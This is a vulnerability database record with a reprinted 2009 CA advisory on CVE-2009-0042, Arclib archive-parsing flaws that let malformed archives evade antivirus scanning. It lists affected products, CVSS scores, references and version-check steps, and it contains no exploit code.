How to determine if you are affected:
For products on Windows:
- Using Windows Explorer, locate the file "arclib.dll". By default, the file is located in the "C:\Program Files\CA\SharedComponents\ScanEngine" directory (*).
- Right click on the file and select Properties.
- Select the Version tab.
File Name File Version arclib.dll 7.3.0.15
*For eTrust Intrusion Detection 2.0 the file is located in "Program Files\eTrust\Intrusion Detection\Common", and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in "Program Files\CA\Intrusion Detection\Common".
For CA Anti-Virus r8.1 on non-Windows platforms:
Use the compver utility provided on the CD to determine the version of Arclib.
Example compver utility output: ------------------------------------------------ COMPONENT NAME VERSION ------------------------------------------------ eTrust Antivirus Arclib Archive Library 7.3.0.15 ... (followed by other components)
For reference, the following are file names for arclib on non-Windows operating systems:
Operating System File name Solaris libarclib.so Linux libarclib.so Mac OS X arclib.bundle
Workaround: Do not open email attachments or download files from untrusted sources.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1777 82
Regards, Ken Williams, Director ; 0xE2941985 CA Product Vulnerability Response Team
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2009 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.9.1 (Build 287) Charset: utf-8
wj8DBQFJfyMKeSWR3+KUGYURAkyRAJ94Db9OT0mSDBo8UiSAK7AWWt5XSgCfc89J SlKLxRwfw06DmTk2tmlcrJI= =Kjse -----END PGP SIGNATURE-----
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "threat manager for the enterprise",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r8"
},
{
"_id": null,
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r2"
},
{
"_id": null,
"model": "anti-virus sdk",
"scope": null,
"trust": 1.4,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.1"
},
{
"_id": null,
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"_id": null,
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.0"
},
{
"_id": null,
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11.1"
},
{
"_id": null,
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"_id": null,
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"_id": null,
"model": "anti-spyware for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"_id": null,
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"_id": null,
"model": "threat manager for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.1"
},
{
"_id": null,
"model": "antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"_id": null,
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r6.1"
},
{
"_id": null,
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"_id": null,
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"_id": null,
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r11.5_nil_"
},
{
"_id": null,
"model": "anti-virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"_id": null,
"model": "anti-spyware",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2008"
},
{
"_id": null,
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11"
},
{
"_id": null,
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r12.0_nil_"
},
{
"_id": null,
"model": "anti-spyware",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2007"
},
{
"_id": null,
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.0"
},
{
"_id": null,
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r3.1"
},
{
"_id": null,
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2007"
},
{
"_id": null,
"model": "arcserve client agent",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"_id": null,
"model": "internet security suite 2007",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3"
},
{
"_id": null,
"model": "internet security suite 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"_id": null,
"model": "anti-spyware for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r8"
},
{
"_id": null,
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r3"
},
{
"_id": null,
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.0"
},
{
"_id": null,
"model": "internet security suite plus 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"_id": null,
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"_id": null,
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r8"
},
{
"_id": null,
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r7"
},
{
"_id": null,
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r11.1"
},
{
"_id": null,
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2008"
},
{
"_id": null,
"model": "anti-spyware 2007",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "anti-spyware 2008",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "anti-spyware for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "anti-virus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "anti-virus for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "anti-virus gateway",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "arcserve backup",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "arcserve for windows client agent",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "arcserve for windows server component",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "common services",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "etrust intrusion detection",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "gateway security",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "internet security suite plus 2008",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "network and systems management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "protection suites",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "secure content manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "threat manager for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "etrust ez antivirus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.1"
},
{
"_id": null,
"model": "common services",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11"
},
{
"_id": null,
"model": "anti-virus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2007"
},
{
"_id": null,
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "r7"
},
{
"_id": null,
"model": "common services",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11.1"
},
{
"_id": null,
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "r8"
},
{
"_id": null,
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.1"
},
{
"_id": null,
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"_id": null,
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"_id": null,
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.0"
},
{
"_id": null,
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"_id": null,
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"_id": null,
"model": "associates threat manager for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"_id": null,
"model": "associates threat manager for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"_id": null,
"model": "associates protection suites r2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"_id": null,
"model": "associates protection suites r3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"_id": null,
"model": "associates protection suites",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"_id": null,
"model": "associates internet security suite plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"_id": null,
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"_id": null,
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"_id": null,
"model": "associates gateway security",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"_id": null,
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"_id": null,
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"_id": null,
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"_id": null,
"model": "associates etrust intrusion detection sp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.01"
},
{
"_id": null,
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"_id": null,
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"_id": null,
"model": "associates etrust intrusion detection sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0.0"
},
{
"_id": null,
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"_id": null,
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"_id": null,
"model": "associates etrust antivirus r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"_id": null,
"model": "associates etrust antivirus r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"_id": null,
"model": "associates common services r11.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"_id": null,
"model": "associates common services r11",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"_id": null,
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"_id": null,
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"_id": null,
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"_id": null,
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"_id": null,
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.0"
},
{
"_id": null,
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"_id": null,
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"_id": null,
"model": "associates arcserve for windows server component",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"_id": null,
"model": "associates arcserve client agent for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"_id": null,
"model": "associates arcserve",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.0"
},
{
"_id": null,
"model": "associates anti-virus sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"_id": null,
"model": "associates anti-virus gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"_id": null,
"model": "associates anti-spyware for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"_id": null,
"model": "associates anti-spyware for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"_id": null,
"model": "associates anti-spyware",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"_id": null,
"model": "associates anti-spyware",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2007"
}
],
"sources": [
{
"db": "BID",
"id": "33464"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:anti-spyware_2007",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-spyware_2008",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-spyware_for_the_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_for_the_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_sdk",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:arcserve_backup",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:arcserve_for_windows_client_agent",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:arcserve_for_windows_server_component",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:common_services",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_intrusion_detection",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:gateway_security",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite_plus_2008",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:network_and_systems_management",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:protection_suites",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:secure_content_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:threat_manager_for_the_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_ez_antivirus",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
}
]
},
"credits": {
"_id": null,
"data": "Thierry Zoller and Sergio Alvarez of n.runs AG",
"sources": [
{
"db": "BID",
"id": "33464"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
],
"trust": 0.9
},
"cve": "CVE-2009-0042",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2009-0042",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-37488",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2009-0042",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2009-0042",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200901-407",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-37488",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-37488"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
}
]
},
"description": {
"_id": null,
"data": "Multiple unspecified vulnerabilities in the Arclib library (arclib.dll) before 7.3.0.15 in the CA Anti-Virus engine for CA Anti-Virus for the Enterprise 7.1, r8, and r8.1; Anti-Virus 2007 v8 and 2008; Internet Security Suite 2007 v3 and 2008; and other CA products allow remote attackers to bypass virus detection via a malformed archive file. Computer Associates Anti-Virus engine is prone to multiple vulnerabilities that may allow certain compressed archives to bypass the scan engine. \nSuccessful exploits will allow attackers to distribute files containing malicious code that the antivirus engine will fail to detect. \nProducts with \u0027arclib.dll\u0027 prior to version 7.3.0.15 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nTitle: CA20090126-01: CA Anti-Virus Engine Detection Evasion \nMultiple Vulnerabilities\n\n\nCA Advisory Reference: CA20090126-01\n\n\nCA Advisory Date: 2009-01-26\n\n\nReported By:\nThierry Zoller and Sergio Alvarez of n.runs AG\n\n\nImpact: A remote attacker can evade detection. CA has \nreleased a new Anti-Virus engine to address the vulnerabilities. \nConsequently, detection evasion can be a concern for gateway \nanti-virus software if archives are not scanned, but the risk is \neffectively mitigated by the desktop anti-virus engine. \n\n\nMitigating Factors: See note above. \n\n\nSeverity: CA has given these vulnerabilities a Low risk rating. If your product is \nconfigured for automatic updates, you should already be protected, \nand you need to take no action. If your product is not configured \nfor automatic updates, then you simply need to run the update \nutility included with your product. \n\n\nHow to determine if you are affected:\n\nFor products on Windows:\n\n1. Using Windows Explorer, locate the file \"arclib.dll\". By \n default, the file is located in the \n \"C:\\Program Files\\CA\\SharedComponents\\ScanEngine\" directory (*). \n2. Right click on the file and select Properties. \n3. Select the Version tab. \n4. \n\nFile Name File Version\narclib.dll 7.3.0.15\n\n*For eTrust Intrusion Detection 2.0 the file is located in \n\"Program Files\\eTrust\\Intrusion Detection\\Common\", and for eTrust \nIntrusion Detection 3.0 and 3.0 sp1, the file is located in \n\"Program Files\\CA\\Intrusion Detection\\Common\". \n\nFor CA Anti-Virus r8.1 on non-Windows platforms:\n\nUse the compver utility provided on the CD to determine the \nversion of Arclib. \n\nExample compver utility output:\n ------------------------------------------------\n COMPONENT NAME VERSION\n ------------------------------------------------\n eTrust Antivirus Arclib Archive Library 7.3.0.15\n ... (followed by other components)\n\nFor reference, the following are file names for arclib on \nnon-Windows operating systems:\n\nOperating System File name\nSolaris libarclib.so\nLinux libarclib.so\nMac OS X arclib.bundle\n\n\nWorkaround: \nDo not open email attachments or download files from untrusted \nsources. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your \nfindings to the CA Product Vulnerability Response Team. \nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1777\n82\n\n\nRegards,\nKen Williams, Director ; 0xE2941985\nCA Product Vulnerability Response Team\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2009 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.9.1 (Build 287)\nCharset: utf-8\n\nwj8DBQFJfyMKeSWR3+KUGYURAkyRAJ94Db9OT0mSDBo8UiSAK7AWWt5XSgCfc89J\nSlKLxRwfw06DmTk2tmlcrJI=\n=Kjse\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-0042"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "BID",
"id": "33464"
},
{
"db": "VULHUB",
"id": "VHN-37488"
},
{
"db": "PACKETSTORM",
"id": "74367"
}
],
"trust": 2.07
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2009-0042",
"trust": 2.9
},
{
"db": "BID",
"id": "33464",
"trust": 2.8
},
{
"db": "SECTRACK",
"id": "1021639",
"trust": 2.5
},
{
"db": "VUPEN",
"id": "ADV-2009-0270",
"trust": 2.5
},
{
"db": "XF",
"id": "48261",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "74367",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-37488",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-37488"
},
{
"db": "BID",
"id": "33464"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "PACKETSTORM",
"id": "74367"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
}
]
},
"id": "VAR-200901-0282",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-37488"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T23:23:31.941000Z",
"patch": {
"_id": null,
"data": [
{
"title": "197601",
"trust": 0.8,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=197601"
},
{
"title": "Computer Associates Anti-Virus Engine Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146829"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-noinfo",
"trust": 0.8
},
{
"problemtype": "CWE-DesignError",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/33464"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1021639"
},
{
"trust": 2.5,
"url": "http://www.vupen.com/english/advisories/2009/0270"
},
{
"trust": 2.0,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=197601"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/500417/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://community.ca.com/blogs/casecurityresponseblog/archive/2009/01/26/ca20090126-01-ca-anti-virus-engine-detection-evasion-multiple-vulnerabilities.aspx"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/48261"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0042"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/48261"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-0042"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/500417"
},
{
"trust": 0.3,
"url": "/archive/1/503447"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0042"
},
{
"trust": 0.1,
"url": "http://www.nruns.com/"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=1777"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://secdev.zoller.lu"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://support.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=1976"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-37488"
},
{
"db": "BID",
"id": "33464"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "PACKETSTORM",
"id": "74367"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-37488",
"ident": null
},
{
"db": "BID",
"id": "33464",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "74367",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2009-0042",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2009-01-28T00:00:00",
"db": "VULHUB",
"id": "VHN-37488",
"ident": null
},
{
"date": "2009-01-27T00:00:00",
"db": "BID",
"id": "33464",
"ident": null
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002620",
"ident": null
},
{
"date": "2009-01-28T00:18:02",
"db": "PACKETSTORM",
"id": "74367",
"ident": null
},
{
"date": "2009-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200901-407",
"ident": null
},
{
"date": "2009-01-28T01:30:00.453000",
"db": "NVD",
"id": "CVE-2009-0042",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2018-10-30T00:00:00",
"db": "VULHUB",
"id": "VHN-37488",
"ident": null
},
{
"date": "2009-05-12T22:06:00",
"db": "BID",
"id": "33464",
"ident": null
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002620",
"ident": null
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200901-407",
"ident": null
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2009-0042",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "74367"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "plural CA Product Arclib library Vulnerabilities that can bypass virus detection",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "design error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
],
"trust": 0.6
}
}
VAR-200707-0544
